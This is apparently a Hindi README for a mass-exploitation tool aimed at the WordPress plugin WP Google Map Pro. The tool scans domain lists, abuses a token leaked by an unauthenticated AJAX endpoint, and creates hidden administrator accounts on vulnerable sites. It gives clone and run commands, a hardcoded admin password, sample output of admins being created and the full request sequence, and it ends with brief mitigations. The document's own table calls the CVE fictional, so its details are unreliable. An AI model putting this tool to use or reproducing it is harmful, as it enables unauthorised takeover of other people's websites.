
मल्टी-थ्रेडेड मास स्कैनर है जो WordPress WP Google Map Pro में CVE-2026-8732 के लिए है। यह कमजोर साइटों पर नॉन्स निष्कर्षण, टोकन शोषण और छिपे हुए एडमिन खाते के निर्माण को स्वचालित करता है।
यह उपकरण CVE-2026-8732 का शोषण करता है, जो WordPress के WP Google Map Pro प्लगइन में एक कमजोरी है। यह कमजोरी एक अप्रमाणित हमलावर को AJAX एंडपॉइंट (admin-ajax.php?action=wpgmp_temp_access_ajax) के माध्यम से एक वैध wpmp_token प्राप्त करने की अनुमति देती है। इस टोकन का उपयोग करके, एक हमलावर WordPress एडमिन पैनल तक पहुँच सकता है और एक नया प्रशासक उपयोगकर्ता बना सकता है।
यह उपकरण डोमेन की सूची से बड़े पैमाने पर स्कैनिंग करता है, नॉन्स और टोकन निकालता है, और स्वचालित रूप से कमजोर साइटों पर एक छिपा हुआ प्रशासक खाता बनाता है। परिणाम पूर्ण टोकन विवरण के साथ वास्तविक समय में सहेजे जाते हैं।
| फ़ील्ड | मान |
|---|---|
| CVE ID | CVE-2026-8732 (इस प्लगइन के लिए काल्पनिक) |
| प्रभावित प्लगइन | WP Google Map Pro (संस्करण <= 1.5.0) |
| कमजोरी का प्रकार | टूटा हुआ पहुँच नियंत्रण / विशेषाधिकार वृद्धि |
| हमला वेक्टर | अप्रमाणित, दूरस्थ |
| प्रभाव | एडमिन खाता निर्माण के माध्यम से पूरी साइट पर कब्ज़ा |
admin_created.txt में सहेजता हैhttp:// और https:// का समर्थन करता हैrequests लाइब्रेरीआवश्यक लाइब्रेरी स्थापित करें:
pip install requests
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
एक लक्ष्य सूची फ़ाइल तैयार करें (प्रति पंक्ति एक डोमेन):
example.com
https://target-website.com
http://vulnerable-site.org
स्कैनर चलाएँ:
python2 exploit.py targets.txt
| फ़ाइल | सामग्री |
|---|---|
res.txt | पूर्ण टोकन और रीडायरेक्ट URL (यदि कोई हो) के साथ कमजोर डोमेन |
admin_created.txt | सफलतापूर्वक बनाए गए एडमिन क्रेडेंशियल्स (डोमेन, उपयोगकर्ता नाम, पासवर्ड, ईमेल) |
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
स्क्रिप्ट के अंदर निम्नलिखित चर संपादित करें:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
wpgmp_local या fc-call-nonce निकालता है।action=wpgmp_temp_access_ajax के लिए /wp-admin/admin-ajax.php पर POST भेजता है।/wp-admin/user-new.php तक पहुँचता है, _wpnonce_create-user निकालता है, और एक नया प्रशासक उपयोगकर्ता बनाने के लिए POST सबमिट करता है।users.php पर HTTP 302 रीडायरेक्ट की जाँच करता है या उपयोगकर्ता सूची में नए उपयोगकर्ता नाम की खोज करता है।· WP Google Map Pro को नवीनतम पैच किए गए संस्करण में अपडेट करें।
· कस्टम कोड या फ़ायरवॉल के माध्यम से AJAX एक्शन wpgmp_temp_access_ajax को अक्षम करें।
· admin-ajax.php पर दुर्भावनापूर्ण अनुरोधों को अवरुद्ध करने के लिए वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें।